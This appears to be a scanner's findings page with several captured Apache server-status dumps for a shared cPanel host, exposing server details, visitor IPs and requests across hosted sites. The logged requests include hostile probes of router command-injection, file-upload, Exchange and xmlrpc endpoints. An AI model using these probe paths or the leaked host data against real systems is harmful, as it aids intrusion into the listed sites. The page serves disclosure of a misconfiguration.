      0-4150130/29/1780_
      7.186447899500.010.10338.23
      77.31.234.174http/1.1jawad.com.sa:443GET /storage/app/public/uploads/products/ZDNMrRb5bmv20smAv3IMZR
      
      0-4150130/26/1885_
      7.05267868561810.00.40159.68
      23.237.44.162http/1.1trynidaa.com:443POST /xmlrpc.php HTTP/1.1
      
      1-4269620/4/2159_
      0.962212631332070.00.03329.69
      66.118.176.148http/1.13dvi.com:443GET /favicon.ico HTTP/1.1
      
      1-4269620/54/1896_
      0.971683695506960.00.38178.33
      40.77.167.8http/1.1albayan.edu.sa:443GET /imgweb/file44/%D8%A8%D9%86%D9%83%20%D8%A7%D9%84%D8%AF%D8%B
      
      1-4269620/54/2066_
      0.9718119625319270.00.04211.58
      194.233.65.81http/1.1jilani.com.sa:80GET /?%3Cplay%3Ewithme%3C/%3E HTTP/1.1
      
      1-4269620/54/1871_
      0.99121343673050.00.08105.40
      40.77.167.49http/1.1jawad.com.sa:443GET /en/details/994 HTTP/1.1
      
      1-4269620/22/1922_
      0.8736825683990.01.09119.81
      34.31.140.44http/1.1sulaimaniya.edu.sa:443GET /wp-content/uploads/2021/12/WhatsApp-Image-2021-11-24-at-8.
      
      1-4269620/58/1899_
      0.91349494059980.00.08184.72
      66.249.66.81http/1.1albayan.edu.sa:443GET /e_sch/news_replies.php?user=web&i_f=1762&page=1 HTTP/1.1
      
      1-4269620/3/2288_
      0.6710325967790.00.25253.30
      69.160.160.53http/1.1
      
      1-4269620/4/1832_
      0.9983273807160.02.66193.32
      51.252.140.162http/1.1jawad.com.sa:44
      Found on 2024-06-16 22:51
    • Severity: medium
      Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31d7a83140d7a8314089ee367c

      Apache Status
      
      Apache Server Status for www.nidaa.ws (via 138.201.201.48)
      
      Server Version: Apache/2.4.59 (cPanel) OpenSSL/1.1.1w mod_bwlimited/1.4 Phusion_Passenger/6.0.22
      Server MPM: worker
      Server Built: May 22 2024 00:34:08
      
      Current Time: Sunday, 16-Jun-2024 11:56:21 +03
      Restart Time: Tuesday, 11-Jun-2024 04:03:04 +03
      Parent Server Config. Generation: 5
      Parent Server MPM Generation: 4
      Server uptime:  5 days 7 hours 53 minutes 16 seconds
      Server load: 0.00 0.03 0.06
      Total accesses: 451809 - Total Traffic: 56.4 GB - Total Duration: 1510193229
      CPU Usage: u243.28 s14.24 cu1980.51 cs418.28 - .577% CPU load
      .981 requests/sec - 128.4 kB/second - 130.8 kB/request - 3342.55 ms/request
      6 requests currently being processed, 0 workers gracefully restarting, 169 idle workers
      __K______________________K____________________________________K_
      _________________________________________________________K______
      __________K___________........................._________________
      ____W___........................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ........
      Scoreboard Key:
      "_" Waiting for Connection, 
      "S" Starting up, 
      "R" Reading Request,
      "W" Sending Reply, 
      "K" Keepalive (read), 
      "D" DNS Lookup,
      "C" Closing connection, 
      "L" Logging, 
      "G" Gracefully finishing, 
      "I" Idle cleanup of worker, 
      "." Open slot with no current process
      
      
      
      SrvPIDAccMCPU
      SSReqDurConnChildSlotClientProtocolVHostRequest
      
      0-4218790/54/1884_
      0.79312298985530.00.05214.70
      172.70.86.9http/1.1qr.brunch.ws:443GET /storage/food_image/17088542497417_imgce640657459b4ca982b52
      
      0-4218790/5/1516_
      0.94435213050.00.12160.08
      172.70.85.21http/1.1qr.brunch.ws:443GET /storage/food_image/17162871173606_novawatersmall.jpg HTTP/
      
      0-4218791/4/1559K
      0.95016726620.80.03140.06
      172.70.160.163http/1.1nidaa.ws:80GET /v2/_catalog HTTP/1.1
      
      0-4218790/10/1584_
      0.833122981940.01.55147.20
      172.70.86.172http/1.1qr.brunch.ws:443GET /storage/food_image/17096783202987_short.webp HTTP/1.1
      
      0-4218790/3/1767_
      0.823124873250.00.02296.98
      172.70.85.56http/1.1qr.brunch.ws:443GET /storage/food_image/17095824407465_tuna.jpg HTTP/1.1
      
      0-4218790/53/1508_
      0.823032481990.00.04167.28
      172.70.85.92http/1.1qr.brunch.ws:443GET /storage/food_image/17088551141700_img60db9211a02345f08b4a9
      
      0-4218790/55/1723_
      0.833053514650.00.07130.31
      172.70.86.185http/1.1qr.brunch.ws:443GET /storage/food_image/17096782595842_risottobeef.webp HTTP/1.
      
      0-4218790/53/1782_
      0.833053136030.00.04189.06
      172.70.86.56http/1.1qr.brunch.ws:443GET /storage/food_image/17096782254653_salmon.webp HTTP/1.1
      
      0-4218790/53/1529_
      0.843062749040.00.0599.27
      172.70.85.53http/1.1qr.brunch.ws:443GET /storage/food_image/17088540548488_img773eaf041bc94628a6943
      
      0-4218790/3/1550_
      0.8430212897440.00.01400.69
      172.70.86.135http/1.1qr.brunch.ws:443GET /storage/food_image/17088572059401_img6304284a8afa40bd9a29a
      
      0-4218790/5/1629_
      0.852764234800.00.16227.54
      172.70.85.79http/1.1qr.brunch.ws:443GET /storage/food_image/17088489046233_c16b6bc81cf4c9583773be26
      
      0-4218790/3/1508_
      0.862553690750.00.05236.75
      172.70.85.14http/1.1qr.brunch.ws:443GET /storage/food_image/17096770987078_minibeefburger.webp HTTP
      
      0-4218790/3/1595_
      0.8822387722750.00.1186.20
      172.70.85.32http/1.1qr.brunch.ws:443GET /storage/food_image/17085173674875_whatsappimage20240221at3
      
      0-4218790/10/1539_
      0.921373885320.00.25141.54
      172.70.85.3http/1.1qr.brunch.ws:443GET /storage/food_image/17162858719396_iceespresso.jpg HTTP/1.1
      
      0-4218790/3/1708_
      0.882237976140.00.03441.05
      172.70.85.141http/1.1qr.brunch.ws:443GET /storage/food_image/17088534426502_img42a4152548b44f0e8731d
      
      0-4218790/4/1631_
      0.891822859900.00.02179.05
      172.70.86.80http/1.1qr.brunch.ws:443GET /storage/food_image/17162869093901_tiramisu.jpg HTTP/1.1
      
      0-4218790/3/1665_
      0.882232219110.00.03158.79
      172.70.85.31http/1.1qr.brunch.ws:443GET /storage/food_image/17088535024089_img94fe21be61cd47f8826a0
      
      0-4218790/2/1591_
      0.722123141560.00.01213.27
      168.76.20.229http/1.1
      
      0-4218790/3/1530_
      0.901543282040.00.03152.70
      172.70.86.54http/1.1qr.brunch.ws:443GET /storage/food_image/17096787797999_watermelon.webp HTTP/1.1
      
      0-4218790/2/1375_
      0.921333592570.00.01240.50
      172.70.85.36http/1.1qr.brunch.ws:443GET /storage/food_image/17162861459998_latte.jpg HTTP/1.1
      
      0-4218790/2/1569_
      0.9261843115750.00.01116.08
      172.70.86.143http/1.1qr.brunch.ws:443GET /storage/food_image/17162863763766_turkishcoffee.jpg HTTP/1
      
      0-4218790/4/1549_
      0.852755600620.00.02123.62
      172.70.86.147http/1.1qr.brunch.ws:443GET /storage/food_image/17088496289494_img9c899fb1a4f74e66accf8
      
      0-4218790/3/1485_
      0.94482495850.00.03166.40
      172.70.85.63http/1.1qr.brunch.ws:443GET /storage/food_image/17162864934951_roselatte.jpg HTTP/1.1
      
      0-4218790/3/1533_
      0.793127183980.00.02317.55
      172.70.85.154http/1.1qr.brunch.ws:443GET /storage/food_image/17095826684933_hallomicroissant.jpg HTT
      
      0-4218790/3/1608_
      0.94428459960.00.01155.67
      172.70.85.165http/1.1qr.brunch.ws:443GET /storage/food_image/17162870753282_sparklingwaterlarge.jpg 
      
      1-4219071/54/1848K
      0.9901631164470.90.42318.02
      172.69.195.44http/1.1nidaa.ws:80GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor
      
      1-4219070/3/1608_
      0.853523581300.00.01165.31
      172.70.86.33http/1.1qr.brunch.ws:443GET /storage/food_image/17096758957930_falafel.webp HTTP/1.1
      
      1-4219070/53/1760_
      0.86322625126910.00.44166.32
      172.70.85.67http/1.1qr.brunch.ws:443GET /storage/food_image/17088573375703_img130e1a230692432da4858
      
      1-4219070/3/1435_
      0.883023499230.00.0275.69
      172.70.85.85http/1.1qr.brunch.ws:443GET /storage/food_image/17088550718992_imgf1df9a3e7ff14f38b4c81
      
      1-4219070/3/1788_
      0.883135595690.00.05115.09
      172.70.85.76http/1.1qr.brunch.ws:443GET /storage/food_image/17085190389947_img50a6ea78846249e9820d1
      
      1-4219070/53/1642_
      0.883013963000.00.04174.93
      172.70.85.52http/1.1qr.brunch.ws:443GET /storage/food_image/17088470831086_img4a9dce7860224c159d1d9
      Found on 2024-06-16 08:56
    • Severity: medium
      Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31d7a83140d7a831406d320ebe

      Apache Status
      
      Apache Server Status for www.nidaa.ws (via 138.201.201.48)
      
      Server Version: Apache/2.4.59 (cPanel) OpenSSL/1.1.1w mod_bwlimited/1.4 Phusion_Passenger/6.0.22
      Server MPM: worker
      Server Built: May 22 2024 00:34:08
      
      Current Time: Thursday, 13-Jun-2024 00:41:52 +03
      Restart Time: Tuesday, 11-Jun-2024 04:03:04 +03
      Parent Server Config. Generation: 3
      Parent Server MPM Generation: 2
      Server uptime:  1 day 20 hours 38 minutes 47 seconds
      Server load: 0.34 0.43 0.44
      Total accesses: 175019 - Total Traffic: 19.0 GB - Total Duration: 219032020
      CPU Usage: u185.98 s20.85 cu647.1 cs127.86 - .611% CPU load
      1.09 requests/sec - 124.2 kB/second - 114.1 kB/request - 1251.48 ms/request
      10 requests currently being processed, 0 workers gracefully restarting, 240 idle workers
      __________________________________________K_____________________
      _K_______________________K____________________________K_________
      ____________K______________________________K____K_______________
      ________.........................__________W_____K______________
      ______________W____.............................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ........
      Scoreboard Key:
      "_" Waiting for Connection, 
      "S" Starting up, 
      "R" Reading Request,
      "W" Sending Reply, 
      "K" Keepalive (read), 
      "D" DNS Lookup,
      "C" Closing connection, 
      "L" Logging, 
      "G" Gracefully finishing, 
      "I" Idle cleanup of worker, 
      "." Open slot with no current process
      
      
      
      SrvPIDAccMCPU
      SSReqDurConnChildSlotClientProtocolVHostRequest
      
      0-2296720/154/763_
      17.986752297225720.012.5973.84
      188.225.60.227http/1.13dvi.com:443GET /storage/media/file/1656231895-arbfonts-tajawal-medium.ttf 
      
      0-2296720/150/669_
      17.881131729080.018.3191.43
      168.149.53.135http/1.1
      
      0-2296720/138/642_
      18.2410355821760.03.6538.09
      168.149.53.135http/1.1jawad.com.sa:443POST /api/v.1/front/category/product HTTP/1.1
      
      0-2296720/153/755_
      18.043833881307450.02.5387.55
      66.118.170.209http/1.1albayan.edu.sa:443GET /images/slider/01.jpg HTTP/1.1
      
      0-2296720/94/680_
      18.0449331551220.03.3992.49
      95.177.180.82http/1.1jilani.com.sa:443GET /public/uploads/files/1562753424_%D8%A3%D8%B3%D9%88%D8%AF_8
      
      0-2296720/120/583_
      18.20696774470.07.4488.97
      65.154.226.166http/1.1jawad.com.sa:443GET /storage/app/public/uploads/products/vBf31fXv4mpCKGy62qfYEj
      
      0-2296720/142/800_
      18.0917121415310.03.4963.32
      66.249.76.137http/1.1albayan.edu.sa:443GET /e_sch/source/inettuts.css HTTP/1.1
      
      0-2296720/150/691_
      18.21592860280.02.6833.90
      17.22.245.57http/1.1jawad.com.sa:443GET /public/front_resources/css/bootstrap.min.css HTTP/1.1
      
      0-2296720/121/661_
      18.0923911151600.09.5030.74
      95.44.13.33http/1.1albayan.edu.sa:443GET /robots.txt HTTP/1.1
      
      0-2296720/172/727_
      18.1213752906190.0118.34213.09
      172.71.114.69http/1.1qr.brunch.ws:443GET /storage/food_image/17088483012112_img38165640179440c2955c8
      
      0-2296720/90/662_
      17.9481232398680.016.6697.34
      84.54.51.37http/1.1php.we3dvi.com:80GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&co
      
      0-2296720/133/656_
      18.207101899690.06.0877.37
      37.139.53.188http/1.1albayan.edu.sa:80GET / HTTP/1.0
      
      0-2296720/114/581_
      18.07262086027200.04.2147.22
      43.135.166.178http/1.13dvi.com:80GET / HTTP/1.1
      
      0-2296720/89/545_
      17.97710252336780.08.9769.11
      127.0.0.1http/1.1php.we3dvi.com:80GET /whm-server-status HTTP/1.0
      
      0-2296720/156/742_
      17.995433804266170.036.7977.85
      50.60.15.100http/1.1albayan.edu.sa:443GET /imgweb/1445/t2.pdf HTTP/1.1
      
      0-2296720/106/649_
      18.23321962122820.03.1977.83
      168.149.53.135http/1.1jawad.com.sa:443GET /storage/app/public/uploads/products/633fUrCfhBJiOfpRsC1PfA
      
      0-2296720/132/657_
      18.1113911409900.013.67110.73
      172.71.114.20http/1.1qr.brunch.ws:443GET /storage/food_image/17088545191116_img8d07b226c7144f5b98ddb
      
      0-2296720/184/678_
      17.95791461360640.03.9682.07
      35.88.16.229http/1.1filter.jawad.com.sa:443GET /ar HTTP/1.1
      
      0-2296720/113/609_
      18.063374632407650.07.5626.27
      52.167.144.206http/1.1albayan.edu.sa:443GET /imgweb/files41/english222.pdf HTTP/1.1
      
      0-2296720/114/566_
      18.14126112863160.033.73101.43
      54.170.63.42http/1.1jawad.com.sa:443GET /ar/category/95 HTTP/1.1
      
      0-2296720/103/508_
      18.1113922138980.02.8766.29
      172.71.114.168http/1.1qr.brunch.ws:443GET /storage/food_image/17095846781958_turkish.webp HTTP/1.1
      
      0-2296720/112/617_
      17.9483131784270.02.8249.55
      65.154.226.168http/1.1albayan.edu.sa:443GET /e_sch/images/footer.jpg HTTP/1.1
      
      0-2296720/127/635_
      18.1113731233580.03.6931.13
      172.71.114.196http/1.1qr.brunch.ws:443GET /storage/food_image/17088544068106_imge898a9bef8f942f99cf7c
      
      0-2296720/162/653_
      18.1313551072230.073.30164.08
      172.71.114.104http/1.1qr.brunch.ws:443GET /storage/food_image/17088535992345_img87d03a054fb04c81a8cc3
      
      0-2296720/110/615_
      18.072752206710550.06.7885.38
      66.249.65.46http/1.1akg.sa:443GET /?darer/1979585 HTTP/1.1
      
      1-2206480/45/895_
      4.6551005527690.00.68144.77
      52.167.144.215http/1.1albayan.edu.sa:80GET /albayan_library/upload/books/________%20________________%2
      
      1-2206480/27/697_
      4.7413311828940.00.88100.87
      172.71.114.51http/1.1qr.brunch.ws:443GET /storage/food_image/17096789003777_struwberry.webp HTTP/1.1
      
      1-2206480/23/769_
      4.6383133195140.00.6058.61
      65.154.226.168http/1.1albayan.edu.sa:443GET /e_sch/js/pe.kenburns/themes/default/img/thumb_bg.png HTTP/
      
      1-2206480/23/639_
      4.89832537510.01.0042.36
      168.149.53.135http/1.1jawad.com.sa:443GET /storage/app/public/uploads/products/lRzGAwljL5u2NMzXoOON27
      
      1-2206480/19/861_
      4.7973172456810.00.2454.59
      17.241.75.38http/1.1jawad.com.sa:443GET /variable-product-page.php?a=3&i_p=812 HTTP/1.1
      
      1-2206480/24/776_
      4.7313662805400.00.3046.25
      172.71.114.136http/1.1qr.brunch.ws:443GET /storage/food_image/17088535024089_img94fe21be61cd47f8826a0
      
      1-2206480/21/779_
      4.6830001266800.01.64150.72
      43.128.110.17http/1.1wahjcm.com:80GET / HTTP/1.1
      
      1-2
      Found on 2024-06-12 21:41
    • Severity: medium
      Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31d7a83140d7a83140c97273e0

      Apache Status
      
      Apache Server Status for www.nidaa.ws (via 138.201.201.48)
      
      Server Version: Apache/2.4.59 (cPanel) OpenSSL/1.1.1w mod_bwlimited/1.4 Phusion_Passenger/6.0.22
      Server MPM: worker
      Server Built: May 22 2024 00:34:08
      
      Current Time: Thursday, 13-Jun-2024 00:01:16 +03
      Restart Time: Tuesday, 11-Jun-2024 04:03:04 +03
      Parent Server Config. Generation: 3
      Parent Server MPM Generation: 2
      Server uptime:  1 day 19 hours 58 minutes 11 seconds
      Server load: 0.63 0.55 0.46
      Total accesses: 172406 - Total Traffic: 18.8 GB - Total Duration: 186739761
      CPU Usage: u173.26 s18.93 cu647.1 cs127.86 - .611% CPU load
      1.09 requests/sec - 124.4 kB/second - 114.2 kB/request - 1083.14 ms/request
      11 requests currently being processed, 0 workers gracefully restarting, 239 idle workers
      _________K______________________________________K______W________
      K_________________________________K___________K_________________
      __________________K___________________K_________________________
      _____K__.........................________K______________________
      _____________W_____.............................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ........
      Scoreboard Key:
      "_" Waiting for Connection, 
      "S" Starting up, 
      "R" Reading Request,
      "W" Sending Reply, 
      "K" Keepalive (read), 
      "D" DNS Lookup,
      "C" Closing connection, 
      "L" Logging, 
      "G" Gracefully finishing, 
      "I" Idle cleanup of worker, 
      "." Open slot with no current process
      
      
      
      SrvPIDAccMCPU
      SSReqDurConnChildSlotClientProtocolVHostRequest
      
      0-2296720/150/759_
      16.60891297224920.012.5273.77
      162.158.189.85http/1.1eg.daaris.com:443GET /assets/scripts/filemanager/dialog.php HTTP/1.1
      
      0-2296720/144/663_
      16.5514351728350.018.2891.40
      172.70.203.151http/1.1qr.brunch.ws:443GET /storage/food_image/17162861459998_latte.jpg HTTP/1.1
      
      0-2296720/134/638_
      16.5514355820960.03.6038.03
      172.70.203.153http/1.1qr.brunch.ws:443GET /storage/food_image/17096789003777_struwberry.webp HTTP/1.1
      
      0-2296720/147/749_
      16.5714251300060.02.0787.09
      172.70.203.150http/1.1qr.brunch.ws:443GET /storage/food_image/17162871303626_novawaterlarge.jpg HTTP/
      
      0-2296720/80/666_
      16.617321546880.02.7091.80
      17.241.75.172http/1.1jawad.com.sa:443GET /index.php?a=3&c=88&i=0 HTTP/1.1
      
      0-2296720/107/570_
      16.401538768810.06.5688.09
      172.71.114.64http/1.1qr.brunch.ws:443GET /storage/food_image/17088571791773_img22d8f50a73dd4253ba14a
      
      0-2296720/124/782_
      16.3015711410840.03.1662.99
      108.162.227.17http/1.1eg.daaris.com:443GET /js/kcfinder/upload.php HTTP/1.1
      
      0-2296720/145/686_
      16.441527859950.02.5333.75
      172.71.114.52http/1.1qr.brunch.ws:443GET /storage/food_image/17162861459998_latte.jpg HTTP/1.1
      
      0-2296720/116/656_
      16.3315331149380.09.4730.71
      172.71.114.45http/1.1qr.brunch.ws:443GET /storage/food_image/17181905534341_regathoniportofinopasta.
      
      0-2296721/131/686K
      16.63212868017.0116.91211.66
      162.158.162.43http/1.1eg.daaris.com:443GET /metronic/assets/global/plugins/jquery-file-upload/server/p
      
      0-2296720/81/653_
      16.5714252397900.016.6297.31
      172.70.203.149http/1.1qr.brunch.ws:443GET /storage/food_image/17088457993768_oip6.jpg HTTP/1.1
      
      0-2296720/128/651_
      16.4315261899030.06.0377.32
      172.71.114.77http/1.1qr.brunch.ws:443GET /storage/food_image/17162860389733_maisonteacup.jpg HTTP/1.
      
      0-2296720/107/574_
      16.59123286025560.04.1647.17
      176.18.28.86http/1.1albayan.edu.sa:443GET /e_sch/images/menu_school.jpg HTTP/1.1
      
      0-2296720/85/541_
      16.6011212335640.08.8669.00
      108.162.226.86http/1.1eg.daaris.com:443GET /scripts/filemanager/dialog.php HTTP/1.1
      
      0-2296720/151/737_
      16.5813814257560.036.1377.19
      162.158.189.38http/1.1eg.daaris.com:443GET /filemanager/dialog.php HTTP/1.1
      
      0-2296720/97/640_
      16.5414492120280.02.9477.58
      172.70.203.134http/1.1qr.brunch.ws:443GET /storage/food_image/17088536517355_imge12175a5596244dd9127e
      
      0-2296720/126/651_
      16.3515351407800.012.77109.83
      172.71.115.43http/1.1qr.brunch.ws:443GET /storage/food_image/17085196668732_imgd5955e49a1e64fdf9ea4f
      
      0-2296720/174/668_
      16.4315261358670.03.9082.00
      172.71.114.149http/1.1qr.brunch.ws:443GET /storage/food_image/17162863763766_turkishcoffee.jpg HTTP/1
      
      0-2296720/109/605_
      16.627172396150.06.0624.77
      20.172.38.178http/1.1albayan.edu.sa:443POST / HTTP/1.1
      
      0-2296720/107/559_
      16.3915352858360.033.46101.16
      172.71.114.106http/1.1qr.brunch.ws:443GET /storage/food_image/17088523246974_imge10c33bc297a444884398
      
      0-2296720/97/502_
      16.5614252127670.02.5165.93
      172.70.203.156http/1.1qr.brunch.ws:443GET /storage/food_image/17162871173606_novawatersmall.jpg HTTP/
      
      0-2296720/93/598_
      16.4015341770600.02.1748.90
      172.71.114.222http/1.1qr.brunch.ws:443GET /storage/food_image/17088572059401_img6304284a8afa40bd9a29a
      
      0-2296720/99/607_
      16.3315361215090.02.3129.75
      172.71.114.34http/1.1qr.brunch.ws:443GET /storage/category_image/17098160489744_2.png HTTP/1.1
      
      0-2296720/156/647_
      16.35153111012770.010.87101.65
      172.71.114.151http/1.1qr.brunch.ws:443GET /storage/food_image/17088468966402_imgadf261aa5e824ed891f72
      
      0-2296720/91/596_
      16.623226702200.05.8584.46
      108.162.226.162http/1.1eg.daaris.com:443GET /assets/lib/jquery-file-upload/server/php/ HTTP/1.1
      
      1-2206480/41/891_
      3.6214255526970.00.58144.67
      172.70.203.147http/1.1qr.brunch.ws:443GET /storage/food_image/17162865285267_saudicoffee.jpg HTTP/1.1
      
      1-2206480/21/691_
      3.5015271827830.00.84100.83
      172.71.114.27http/1.1qr.brunch.ws:443GET /storage/food_image/17162862904287_cappuccino.jpg HTTP/1.1
      
      1-2206480/13/759_
      3.4715353186470.00.1958.20
      172.71.114.101http/1.1qr.brunch.ws:443GET /storage/food_image/17088546313133_imga42b7dec0beb4587b22a0
      
      1-2206480/16/632_
      3.4515352526780.00.1641.52
      172.71.115.25http/1.1qr.brunch.ws:443GET /storage/food_image/17095847662994_salmonbendect.jpg HTTP/1
      
      1-2206480/14/856_
      3.5215142456190.00.1754.52
      172.71.114.38http/1.1qr.brunch.ws:443GET /storage/food_image/17162870753282_sparklingwaterlarge.jpg 
      
      1-2206480/15/767_
      3.4515312804430.00.0846.02
      172.71.114.180http/1.1qr.brunch.ws:443GET /storage/food_image/171819175
      Found on 2024-06-12 21:01
    • Severity: medium
      Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31d7a83140d7a83140d56c3c45

      Apache Status
      
      Apache Server Status for www.nidaa.ws (via 138.201.201.48)
      
      Server Version: Apache/2.4.59 (cPanel) OpenSSL/1.1.1w mod_bwlimited/1.4 Phusion_Passenger/6.0.22
      Server MPM: worker
      Server Built: May 22 2024 00:34:08
      
      Current Time: Monday, 10-Jun-2024 22:05:37 +03
      Restart Time: Thursday, 23-May-2024 04:04:49 +03
      Parent Server Config. Generation: 11
      Parent Server MPM Generation: 10
      Server uptime:  18 days 18 hours 47 seconds
      Server load: 0.31 0.33 0.41
      Total accesses: 3011692 - Total Traffic: 405.7 GB - Total Duration: 3109456252
      CPU Usage: u850.76 s47.13 cu12247.9 cs2733.34 - .98% CPU load
      1.86 requests/sec - 262.6 kB/second - 141.3 kB/request - 1032.46 ms/request
      11 requests currently being processed, 0 workers gracefully restarting, 239 idle workers
      __________________________K____________________________________K
      ______________________________________K________R_____________WWW
      WWWWWWWWWWWWWWWWWWWWWW_____________K__K____________________K__R_
      __________K______________________.............W...........______
      ______K____________.........................W___________________
      _____...........................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ........
      Scoreboard Key:
      "_" Waiting for Connection, 
      "S" Starting up, 
      "R" Reading Request,
      "W" Sending Reply, 
      "K" Keepalive (read), 
      "D" DNS Lookup,
      "C" Closing connection, 
      "L" Logging, 
      "G" Gracefully finishing, 
      "I" Idle cleanup of worker, 
      "." Open slot with no current process
      
      
      
      SrvPIDAccMCPU
      SSReqDurConnChildSlotClientProtocolVHostRequest
      
      0-1077620/148/13991_
      17.981765113717140.04.941853.30
      217.113.194.245http/1.1albayan.edu.sa:443GET /albayan_library/Books.php?sec=624 HTTP/1.1
      
      0-1077620/125/12111_
      17.92317075974570.014.391785.11
      195.191.219.131http/1.1albayan.edu.sa:80GET /e_sch/code/news/db.php?j=5&q=1387&t=192.99.13.186&c=5 HTTP
      
      0-1077620/92/12303_
      18.0290568111180.010.241697.52
      217.113.194.241http/1.1albayan.edu.sa:443GET /albayan_library/Books.php?sec=612 HTTP/1.1
      
      0-1077620/154/13065_
      17.972280403140230.08.921769.02
      195.191.219.131http/1.1albayan.edu.sa:80GET /e_sch/code/news/db.php?j=5&q=1411&t=65.108.143.154&c=5 HTT
      
      0-1077620/103/12845_
      18.01117194289292740.013.681653.11
      95.181.235.12http/1.1jawad.com.sa:443GET /public/front_resources/fonts/fontawesome-webfont.woff2?v=4
      
      0-1077620/197/12842_
      17.913321170205050.046.292069.86
      87.236.176.220http/1.1trynidaa.com:443GET /wp-content/uploads/2024/01/cropped-Untitled-2-32x32.jpg HT
      
      0-1077620/126/12893_
      18.04190160104540.05.451884.53
      217.113.194.252http/1.1albayan.edu.sa:80GET /albayan_library/BooksVi.php?b=339 HTTP/1.1
      
      0-1077620/106/12252_
      17.913675227543090.035.651925.12
      66.249.64.12http/1.1albayan.edu.sa:443GET /albayan_library/Categorys3.php?sec=716 HTTP/1.1
      
      0-1077620/179/13564_
      17.98183091233250.08.791940.19
      195.191.219.131http/1.1albayan.edu.sa:80GET /e_sch/code/forum/db.php?j=1&q=393&t=158.69.23.126&c=5 HTTP
      
      0-1077620/121/13239_
      18.0251681239510.06.141721.62
      217.113.194.250http/1.1albayan.edu.sa:443GET /albayan_library/Books.php?sec=1019 HTTP/1.1
      
      0-1077620/171/12923_
      18.01990294185320.012.221455.97
      195.191.219.131http/1.1albayan.edu.sa:80GET /e_sch/code/forum/db.php?j=1&q=436&t=167.114.116.25&c=5 HTT
      
      0-1077620/216/13549_
      17.95285178552300.026.201431.32
      216.244.66.198http/1.1albayan.edu.sa:443GET /imgweb/file42/54345436.jpeg HTTP/1.1
      
      0-1077620/153/12987_
      18.041295071790.08.602029.50
      172.70.80.48http/1.1nidaa.ws:80GET / HTTP/1.1
      
      0-1077620/132/12799_
      17.98217580983680.06.891866.96
      217.113.194.250http/1.1albayan.edu.sa:443GET /e_sch/code/forum/db.php?j=3&q=58&t=217.113.194.250&c=5 HTT
      
      0-1077620/173/12353_
      17.904214129570440.03.731336.85
